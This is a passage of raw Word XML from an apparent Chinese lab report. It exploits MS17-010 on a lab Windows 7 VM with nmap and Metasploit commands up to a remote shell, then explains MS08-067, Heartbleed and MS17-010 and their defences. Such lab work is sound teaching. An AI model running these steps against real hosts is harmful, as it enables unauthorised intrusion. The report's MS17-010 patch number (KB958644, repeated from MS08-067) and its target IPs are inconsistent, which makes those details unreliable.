            <wp:docPr id="68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" title="fig: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79361" cy="783771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5B713E1">
      <w:pPr>
        <w:pStyle w:val="3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>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118A2B8F">
      <w:pPr>
        <w:pStyle w:val="3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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3850640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71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" title="fig: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3851156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4685B7B">
      <w:pPr>
        <w:pStyle w:val="3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>渗透成功</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:bookmarkEnd w:id="7"/>
    <w:p w14:paraId="4435B2C5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="ms17-010漏洞"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>MS17-010漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4445A274">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="漏洞描述-2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD4E634">
      <w:pPr>
        <w:pStyle w:val="23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 xml:space="preserve">s17_010 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>是一种操作系统漏洞，仅影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>系统中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMBv1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>服务。这个漏洞是由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMBv1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统，并执行任意代码。这个漏洞通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 445 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>文件共享端口进行利用，一旦攻击者成功利用该漏洞，就可以在目标主机上植入各种恶意软件，如勒索软件。最近出现的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> WannaCry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>勒索软件就使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> ms17_010 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>漏洞来传播和植入勒索代码，将目标系统中的所有文件加密并威胁用户付款。由于该漏洞易受攻击，且已经公开和广泛利用，因此建议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>系统用户及时进行安全更新以避免被攻击。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:p w14:paraId="3EF24299">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="渗透过程-3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>渗透过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7C442B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr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>环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B92CCA">
      <w:pPr>
        <w:pStyle w:val="23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>靶机:windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7(64bit) -&gt;192.168.132.134</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D58E8DF">
      <w:pPr>
        <w:pStyle w:val="3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>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> kali-&gt;192.168.132.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E34BC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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>扫描存活IP和端口开放</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056011DF">
      <w:pPr>
        <w:pStyle w:val="23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 xml:space="preserve">ping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>192.168.132.132，靶机存活</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F480623">
      <w:pPr>
        <w:pStyle w:val="3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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4003040" cy="1244600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="77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" title="fig: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03381" cy="1244813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43D2FA5">
      <w:pPr>
        <w:pStyle w:val="3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 xml:space="preserve">nmap -T4 -A -v -Pn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>192.168.132.132进行全面扫描，扫描网段存活IP，以及端口开放情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564D6A66">
      <w:pPr>
        <w:pStyle w:val="3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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3756025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="80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" title="fig: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37564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A31E3FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sV -sT --script=vuln -p 445 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>192.168.132.134探测漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AEF5D9">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="4173220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="83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" title="fig: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4173819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5955599">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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>MSF终端渗透攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66431470">
      <w:pPr>
        <w:pStyle w:val="23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>search ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A33B0B8">
      <w:pPr>
        <w:pStyle w:val="3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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2783205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86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" title="fig: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783353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647CEBC">
      <w:pPr>
        <w:pStyle w:val="3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>use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B04CBD">
      <w:pPr>
        <w:pStyle w:val="3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 xml:space="preserve">show </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>options查看参数和载荷，参数只需要设置一个rhost目标主机ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F621E57">
      <w:pPr>
        <w:pStyle w:val="3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>set rhosts 192.168.132.134</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAF3DDA">
      <w:pPr>
        <w:pStyle w:val="3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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2960370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="89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" title="fig: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960949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2271816">
      <w:pPr>
        <w:pStyle w:val="3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>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760C6299">
      <w:pPr>
        <w:pStyle w:val="3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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2778760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92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" title="fig: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778921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B356E50">
      <w:pPr>
        <w:pStyle w:val="3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>输入shell，获得靶机控制权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0589E92D">
      <w:pPr>
        <w:pStyle w:val="3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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3365500" cy="890905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="95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" title="fig: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365606" cy="891347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709A9D4">
      <w:pPr>
        <w:pStyle w:val="3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>测试，输入dir，获取靶机目录信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673A62AA">
      <w:pPr>
        <w:pStyle w:val="3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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3980180" cy="4233545"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98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" title="fig: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980329" cy="4233902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bookmarkEnd w:id="8"/>
    <w:bookmarkEnd w:id="10"/>
    <w:p w14:paraId="0572A13B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="分析所测试的攻击的原理或机制"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>分析所测试的攻击的原理或机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711EF014">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="ms08-067"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>MS08-067</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727796DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>漏洞触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：MS08-067漏洞是通过MSRPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>SMB通道调用Server程序中的NetPathCanonicalize函数时触发的。这个函数在远程访问其他主机时，会调用NetpwPathCanonicalize函数对远程访问的路径进行规范化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2BAE13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>缓冲区溢出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：在NetpwPathCanonicalize函数中，由于逻辑错误，当处理包含特定模式（如“/../../”）的路径字符串时，会发生栈缓冲区内存错误（溢出）。这种溢出允许攻击者覆盖函数返回地址，从而控制执行流程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7394CA4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>远程代码执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：通过精心设计的输入路径，攻击者可以构造恶意数据包，发送到受害者主机的445端口，导致栈缓冲区溢出并执行任意代码。这可能包括安装后门、窃取信息或进一步传播蠕虫病毒。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:p w14:paraId="30591324">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="heartbleed-2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>Heartbleed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293F158D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>漏洞概述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：Heartbleed漏洞是由于OpenSSL库在实现TLS和DTLS的心跳处理逻辑时，没有检测心跳包中的长度字段是否和后续的数据字段相符合。攻击者可以利用这一点，构造异常的数据包，来获取心跳数据所在的内存区域的后续数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C585850">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>具体过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：当攻击者向受影响的服务器发送一个恶意的心跳请求时，服务器会分配一块内存用于存储心跳响应。由于心跳请求的长度超过实际有效数据的长度，服务器会将内存中的敏感信息连同心跳响应一起返回给攻击者。这样，攻击者就可以从返回的数据中提取敏感信息，如私钥、用户名和密码等</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:p w14:paraId="127807EA">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="ms17-010"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>MS17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D215760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>漏洞概述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：MS17-010漏洞是由于Windows系统的SMBv1服务中的缓冲区溢出导致的。这个漏洞允许攻击者通过TCP的445端口远程执行恶意代码，控制受感染的计算机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5F161A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>利用方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：攻击者可以通过构造特定的恶意数据包，发送到受害者主机的445端口，导致栈缓冲区溢出并执行任意代码。这种溢出允许攻击者在未经身份验证的情况下，远程控制目标系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB1F274">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>影响范围</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：该漏洞主要影响Windows系统中的SMBv1服务，包括但不限于Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>8等版本。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkEnd w:id="14"/>
    <w:p w14:paraId="1BD20347">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="防范方法"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>防范方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFF529E">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="ms08-067-2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>MS08-067</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59714315">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>安装补丁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：微软已经发布了针对MS08-067漏洞的安全补丁KB958644。用户应及时下载并安装此补丁，以修复漏洞并防止被攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADFA7CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>关闭或屏蔽445端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：由于该漏洞主要通过445端口进行攻击，因此关闭或屏蔽该端口可以有效减少被攻击的风险。可以通过防火墙设置来禁止外部访问445端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EE5003">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>使用专业防火墙</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：部署专业的网络防火墙，不仅可以限制对特定端口的访问，还可以提供更全面的网络安全防护</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:p w14:paraId="6436C2F8">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="heartbleed-3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>Heartbleed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067A5644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>更新OpenSSL版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：及时更新受影响的OpenSSL版本是修复Heartbleed漏洞的最佳方式。OpenSSL项目组在漏洞公开披露后迅速修复了这个漏洞，并发布了安全补丁。管理员和开发人员应该立即更新受影响的OpenSSL版本，并重新生成和部署服务器的证书和密钥。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7A87BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>禁用不安全的协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：除了修复OpenSSL库，还应该更新服务器上使用的SSL/TLS协议版本。较新的协议版本通常会修复已知的安全漏洞，并提供更强大的加密和身份验证机制。管理员应该禁用不安全的SSL/TLS协议版本（如SSLv2和SSLv3），并优先使用更安全的协议版本（如TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>1.2和TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>1.3）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:p w14:paraId="0238060A">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="ms17-010-2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>MS17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F205BC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>更新补丁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：微软已经发布了针对MS17-010漏洞的安全补丁KB958644。用户应及时下载并安装此补丁，以修复漏洞并防止被攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68740D9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>关闭SMBv1服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
